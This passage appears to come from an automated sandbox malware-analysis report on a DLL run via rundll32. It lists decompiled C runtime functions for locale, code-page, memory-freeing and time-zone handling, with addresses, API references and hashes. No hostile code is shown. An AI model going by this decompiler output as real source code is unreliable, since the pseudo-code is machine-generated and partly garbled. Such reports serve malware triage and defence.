									if(E6E254323(_t100, _t154, _t121 + 0x120, 0x1002, _t92, 0x40) == 0) {
										goto L31;
									} else {
										_push(0x5f);
										_t71 = E6E267BBB(_t100);
										_t112 = _t92;
										if(_t71 != 0) {
											L28:
											if(E6E254323(_t112, _t157, _t121 + 0x120, 7, _t92, 0x40) == 0) {
												goto L31;
											} else {
												goto L29;
											}
										} else {
											_push(0x2e);
											_t76 = E6E267BBB(_t112);
											_t112 = _t92;
											_t157 = _t76;
											if(_t76 == 0) {
												L29:
												E6E265124(_t112, _t127, _t121 + 0x100, 0x10, 0xa);
												goto L30;
											} else {
												goto L28;
											}
										}
									}
								}
								L32:
								return _t39;
							}
						}
					}
				}
			}

0x6e25dd96
0x6e25dd9b
0x6e25dd9c
0x6e25dd9d
0x6e25dd9f
0x6e25dda0
0x6e25dda5
0x6e25dda8
0x6e25ddaa
0x6e25ddad
0x6e25ddad
0x6e25ddb0
0x6e25ddb0
0x6e25ddb6
0x6e25ddb9
0x6e25ddbc
0x6e25ddbc
0x6e25ddbf
0x6e25ddc2
0x6e25ddc8
0x6e25ddca
0x6e25ddcf
0x6e25ddd9
0x6e25ddde
0x6e25dde1
0x6e25dde1
0x6e25dde5
0x6e25dde9
0x6e25de32
0x00000000
0x6e25ddeb
0x6e25ddf0
0x6e25ddf9
0x6e25ddf2
0x6e25ddf2
0x6e25ddf2
0x6e25de00
0x6e25de04
0x6e25de0e
0x6e25de13
0x6e25de18
0x6e25de1e
0x6e25de22
0x6e25de2b
0x6e25de24
0x6e25de24
0x6e25de24
0x6e25de37
0x6e25de37
0x6e25de37
0x6e25de18
0x6e25de04
0x6e25de3d
0x6e25df4f
0x6e25df4f
0x6e25df4f
0x00000000
0x6e25de43
0x6e25de50
0x6e25de56
0x00000000
0x6e25de86
0x6e25de86
0x6e25de8b
0x6e25de8d
0x6e25de8d
0x6e25de8f
0x6e25de8f
0x6e25de94
0x6e25df4a
0x6e25df4c
0x00000000
0x6e25de9a
0x6e25de9a
0x6e25de9d
0x6e25dea5
0x6e25dea8
0x6e25deab
0x6e25deab
0x6e25deae
0x6e25deb1
0x6e25deb9
0x6e25debe
0x6e25dec5
0x6e25deca
0x6e25decd
0x6e25decf
0x6e25df5a
0x6e25df5b
0x6e25df5c
0x6e25df5d
0x6e25df5e
0x6e25df5f
0x6e25df64
0x6e25df68
0x6e25df70
0x6e25df77
0x6e25df7a
0x6e25df7b
0x6e25df7f
0x6e25df85
0x6e25df8d
0x6e25df9c
0x6e25dfa8
0x6e25dfb9
0x6e25dfbf
0x6e25dfc1
0x6e25dfd2
0x6e25dfd9
0x6e25dfdb
0x6e25dfde
0x6e25dfe4
0x6e25dfe6
0x6e25dfe8
0x6e25dfe8
0x6e25dfeb
0x6e25dfee
0x6e25dfee
0x6e25dfe6
0x6e25dff8
0x6e25dfc3
0x6e25dfc3
0x6e25dfc5
0x6e25dfff
0x6e25e000
0x6e25e00b
0x6e25ded5
0x6e25dede
0x6e25dee3
0x6e25dee5
0x00000000
0x6e25dee7
0x6e25dee9
0x6e25df03
0x00000000
0x6e25df05
0x6e25df05
0x6e25df08
0x6e25df0e
0x6e25df11
0x6e25df21
0x6e25df34
0x00000000
0x00000000
0x00000000
0x00000000
0x6e25df13
0x6e25df13
0x6e25df16
0x6e25df1c
0x6e25df1d
0x6e25df1f
0x6e25df36
0x6e25df42
0x00000000
0x00000000
0x00000000
0x00000000
0x6e25df1f
0x6e25df11
0x6e25df03
0x6e25df51
0x6e25df57
0x6e25df57
0x6e25decf
0x6e25de94
0x6e25de56

APIs

Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,924FAE9A), ref: 6E24D603
Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,924FAE9A), ref: 6E24D677
Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E24E042,?,?,?,?,6E24DA1E,?,00000004), ref: 6E25DE78
_wcschr.LIBVCRUNTIME ref: 6E25DF08
_wcschr.LIBVCRUNTIME ref: 6E25DF16
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,B$n,00000000,?), ref: 6E25DFB9

Strings

B$n, xrefs: 6E25DE8F, 6E25DED7, 6E25DF7F
)'nU, xrefs: 6E25DDD4
t!'nE, xrefs: 6E25DE09

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: )'nU$B$n$t!'nE
API String ID: 4212172061-2691769108
Opcode ID: 3410f5026dad02189e62c584e52bcc8349c0951207dd4bb4e4bd8fed7cacce64
Instruction ID: 2b251e721f309d78bfe7e04eb351676c9dd4c35e7766c24981b4a7f2a843bb41
Opcode Fuzzy Hash: 3410f5026dad02189e62c584e52bcc8349c0951207dd4bb4e4bd8fed7cacce64
Instruction Fuzzy Hash: 9D61077651420FABE7149BB5CD45BAB73AEEF05705F10086AE919DB380EB30E5618B60

Uniqueness

Uniqueness Score: -1.00%

Function 6E25E518, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E6E25E518(void* __ecx, signed int _a4, char _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t11 =  &_a8; // 0x6e25e837
					if(GetLocaleInfoW( *( *_t11 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x6e272f08;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x6e272f10;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E6E24BF09(_t23, _t23);
									goto L25;
								}
								_t7 =  &_a8; // 0x6e25e837
								if(GetLocaleInfoW( *( *_t7 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x6e25e51d
0x6e25e51e
0x6e25e525
0x6e25e5c9
0x6e25e5cf
0x6e25e5e2
0x6e25e5e8
0x6e25e5ed
0x6e25e5ef
0x6e25e5ef
0x6e25e5f5
0x6e25e5fa
0x6e25e5fa
0x6e25e5e4
0x6e25e5e4
0x00000000
0x6e25e5e4
0x6e25e52b
0x6e25e530
0x00000000
0x00000000
0x6e25e536
0x6e25e53b
0x6e25e53d
0x6e25e53d
0x6e25e543
0x00000000
0x00000000
0x6e25e548
0x6e25e55f
0x6e25e55f
0x6e25e568
0x6e25e56a
0x00000000
0x00000000
0x6e25e56c
0x6e25e571
0x6e25e573
0x6e25e573
0x6e25e579
0x00000000
0x00000000
0x6e25e57e
0x6e25e59c
0x6e25e59e
0x6e25e5c1
0x00000000
0x6e25e5c6
0x6e25e5a6
0x6e25e5b9
0x00000000
0x00000000
0x6e25e5bb
0x00000000
0x6e25e5bb
0x6e25e580
0x6e25e588
0x00000000
0x00000000
0x6e25e58a
0x6e25e58d
0x6e25e593
0x00000000
0x00000000
0x00000000
0x6e25e595
0x6e25e597
0x6e25e599
0x00000000
0x6e25e599
0x6e25e54a
0x6e25e552
0x00000000
0x00000000
0x6e25e554
0x6e25e557
0x6e25e55d
0x00000000
0x00000000
0x00000000
0x6e25e55d
0x6e25e563
0x6e25e565
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,6E25E837,?,00000000), ref: 6E25E5B1
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,6E25E837,?,00000000), ref: 6E25E5DA
GetACP.KERNEL32(?,?,6E25E837,?,00000000), ref: 6E25E5EF

Strings

OCP, xrefs: 6E25E56C
ACP, xrefs: 6E25E536
7%n, xrefs: 6E25E5CF, 6E25E5A6

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: 7%n$ACP$OCP
API String ID: 2299586839-4090478770
Opcode ID: 646b781da5e3297031d96d5bdb43cd2efe43efc50c8349720b12df6b31ebd355
Instruction ID: 69987023b77f53b8312c72898458cf337b6296a8d7c1e5f85c75278e2aa7208e
Opcode Fuzzy Hash: 646b781da5e3297031d96d5bdb43cd2efe43efc50c8349720b12df6b31ebd355
Instruction Fuzzy Hash: 8821C1B261410EABE7A08FD9CB04A8777B7EB45B21B568465E91AC7308F732DD60C750

Uniqueness

Uniqueness Score: -1.00%

Function 6E25BF64, Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E25BF64(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6e2c50b8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6E24CBD3(_t46);
							E6E25C7CF( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6E24CBD3(_t47);
							E6E25CCC3( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6E24CBD3( *((intOrPtr*)(_t74 + 0x7c)));
						E6E24CBD3( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6E24CBD3( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6E24CBD3( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6E24CBD3( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6E24CBD3( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6E25C0D7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa0
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x28
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6e2c52b0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6E24CBD3(_t31);
							E6E24CBD3( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6E24CBD3(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6E24CBD3(_t74);
			}

APIs

___free_lconv_mon.LIBCMT ref: 6E25BFA8

Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C7EC
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C7FE
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C810
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C822
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C834
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C846
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C858
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C86A
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C87C
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C88E
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C8A0
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C8B2
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C8C4

_free.LIBCMT ref: 6E25BF9D

Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB

_free.LIBCMT ref: 6E25BFBF
_free.LIBCMT ref: 6E25BFD4
_free.LIBCMT ref: 6E25BFDF
_free.LIBCMT ref: 6E25C001
_free.LIBCMT ref: 6E25C014
_free.LIBCMT ref: 6E25C022
_free.LIBCMT ref: 6E25C02D
_free.LIBCMT ref: 6E25C065
_free.LIBCMT ref: 6E25C06C
_free.LIBCMT ref: 6E25C089
_free.LIBCMT ref: 6E25C0A1

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 9e2b707382a9bce83ac7c2478675cdbb2857b87fa4640b4bb6638e2bbf7300ad
Instruction ID: 8e10108ec5c9639180e93905bc15030a070d53f974845a8b297362a1babc60cf
Opcode Fuzzy Hash: 9e2b707382a9bce83ac7c2478675cdbb2857b87fa4640b4bb6638e2bbf7300ad
Instruction Fuzzy Hash: 63319E3560430EDFFB648BB8D942B9673FBAF00B15F204829E069CB251EF75A9648B10

Uniqueness

Uniqueness Score: -1.00%

Function 6E25877C, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370
timeCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E6E25877C(void* __ebx, void* __edi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				void* _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __esi;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				intOrPtr _t167;
				signed int _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t171 = __edi;
				_t65 = E6E25822B();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E6E258289( &_v8) != 0 || E6E258231( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E242188();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E6E25822B();
					_t32 =  &_v52; // 0x6e272130
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E6E258289(_t32);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E6E242188();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x6e2c506c; // 0x2b33ced3
						_v100 = _t74 ^ _t192;
						 *0x6e2c5384 =  *0x6e2c5384 | 0xffffffff;
						 *0x6e2c5378 =  *0x6e2c5378 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t172 = 0;
						 *0x6e2c7a10 = 0;
						_t78 = E6E251216(0x6e272130, _t167, 0, __eflags,  &_v360,  &_v356, 0x100, 0x6e272130);
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E6E24F26D(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E6E251216(0x6e272130, _t167, 0, __eflags,  &_v280, _t184, _v276, 0x6e272130);
									__eflags = _t85;
									if(_t85 == 0) {
										E6E24CBD3(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L73;
									}
								} else {
									_push(0);
									L73:
									E6E24CBD3();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L81:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L81;
							} else {
								_push(_t172);
								E6E25877C(0x6e272130, _t172, __eflags);
							}
						}
						E6E24CBD3(_t183);
						__eflags = _v16 ^ _t192;
						return E6E21F8A5(_v16 ^ _t192, _t167, _t183);
					} else {
						_t89 = E6E258231( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E6E25825D( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E6E24CBD3( *0x6e2c7a08);
								 *0x6e2c7a08 = 0;
								 *_t194 = 0x6e2c7a18;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x6e2c7a18 * 0x3c;
									_t168 =  *0x6e2c7a6c; // 0x0
									_push(_t171);
									 *0x6e2c7a10 = 1;
									_v12 = _t150;
									__eflags =  *0x6e2c7a5e; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t168 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x6e2c7ab2; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x6e2c7ac0; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t168) * 0x3c;
										}
									}
									_t176 = E6E243CD0(0, _t168);
									_t99 = WideCharToMultiByte(_t176, 0, 0x6e2c7a1c, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x6e2c7a70, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E6E258225()) = _v12;
								 *((intOrPtr*)(E6E258219())) = _v16;
								_t96 = E6E25821F();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t169 =  *0x6e2c7a08; // 0x0
					_t178 = _a4;
					if(_t169 == 0) {
						L12:
						E6E24CBD3(_t169);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x6e258b6d
						_t170 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t170 + 1; // 0x6e258b6e
						 *0x6e2c7a08 = E6E24F26D(_t154 - _t170, _t13);
						_t116 = E6E24CBD3(0);
						_t167 =  *0x6e2c7a08; // 0x0
						if(_t167 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x6e258b6d
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x6e258b6e
							_t119 = E6E24AB60(_t167, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E6E263B33(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E6E24BFB3(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E6E24BFB3(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E6E24BFB3(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E6E258225()) = _v8;
										_t128 = E6E258219();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E6E263B33(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t169;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L83;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L83:
			}

APIs

_free.LIBCMT ref: 6E2587FE
_free.LIBCMT ref: 6E258822
_free.LIBCMT ref: 6E2589A9
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E272130), ref: 6E2589BB
WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E258A33
WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A70,000000FF,?,0000003F,00000000,?), ref: 6E258A60
_free.LIBCMT ref: 6E258B75

Strings

0!'n, xrefs: 6E258964, 6E25896A
0!'n, xrefs: 6E258AD8

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: 0!'n$0!'n
API String ID: 314583886-1210743812
Opcode ID: 3b10f6e159776faeafea66aeba6cfd4dce3aeb173e0cf366b9780b57561367ea
Instruction ID: 8658e827d0e1df55776df3c13426c912fb94c955fdc5083b5a76bfd8b80036cb
Opcode Fuzzy Hash: 3b10f6e159776faeafea66aeba6cfd4dce3aeb173e0cf366b9780b57561367ea
Instruction Fuzzy Hash: 87C1357592424EEBDB488FF9CE54AAA7BBBEF42314F1409BAD451D7380E7B08A11C750

Uniqueness

Uniqueness Score: -1.00%

Function 6E24D3EF, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E24D3EF(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x6e270c10) {
					E6E24CBD3(_t52);
					_t26 = _a4;
				}
				E6E24CBD3( *((intOrPtr*)(_t26 + 0x3c)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x30)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x34)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x38)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x28)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x2c)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x40)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x44)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E6E24D23E(5,  &_v8);
				_v8 =  &_a4;
				return E6E24D28E(4,  &_v8);
			}

APIs

